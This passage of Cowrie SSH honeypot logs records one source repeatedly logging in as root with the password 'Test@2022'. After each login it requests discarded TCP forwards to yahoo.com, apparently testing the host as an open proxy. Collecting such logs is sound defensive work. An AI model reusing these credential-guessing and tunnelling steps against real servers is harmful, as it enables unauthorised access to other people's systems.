{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.926246Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.209327Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4976,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4976","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.267716Z","session":"84346f7c3ee3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.324837Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2930,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2930","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.479608Z","session":"84346f7c3ee3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.536423Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.594101Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50806,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a42814f7f20","protocol":"ssh","message":"New connection: 213.209.150.239:50806 (1.2.3.4:22) [session: 9a42814f7f20]","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.640321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.641244Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.688873Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.924156Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":7562,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7562","sensor":"my-vps","timestamp":"2025-08-26T01:08:02.972244Z","session":"9a42814f7f20"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.019701Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26351,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26351","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.157527Z","session":"9a42814f7f20"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.204974Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.253044Z","src_ip":"213.209.150.239","session":"9a42814f7f20"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50871,"dst_ip":"1.2.3.4","dst_port":22,"session":"e60336f1592f","protocol":"ssh","message":"New connection: 213.209.150.239:50871 (1.2.3.4:22) [session: e60336f1592f]","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.299054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.299785Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.347059Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.580952Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14098,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14098","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.628716Z","session":"e60336f1592f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.675806Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":1267,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1267","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.813325Z","session":"e60336f1592f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.860422Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.908173Z","src_ip":"213.209.150.239","session":"e60336f1592f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50938,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4881a07bc17","protocol":"ssh","message":"New connection: 213.209.150.239:50938 (1.2.3.4:22) [session: e4881a07bc17]","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.954746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:03.955544Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.002904Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.237862Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11344,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11344","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.286107Z","session":"e4881a07bc17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.333567Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6439,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6439","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.469635Z","session":"e4881a07bc17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.517941Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.566154Z","src_ip":"213.209.150.239","session":"e4881a07bc17"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51096,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e9818bd489","protocol":"ssh","message":"New connection: 213.209.150.239:51096 (1.2.3.4:22) [session: 65e9818bd489]","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.612328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.613260Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.660500Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.895534Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31836,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31836","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.943663Z","session":"65e9818bd489"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:04.991158Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14984,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14984","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.125801Z","session":"65e9818bd489"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.173055Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.221375Z","src_ip":"213.209.150.239","session":"65e9818bd489"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51152,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee8265e0e4f0","protocol":"ssh","message":"New connection: 213.209.150.239:51152 (1.2.3.4:22) [session: ee8265e0e4f0]","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.267684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.268684Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 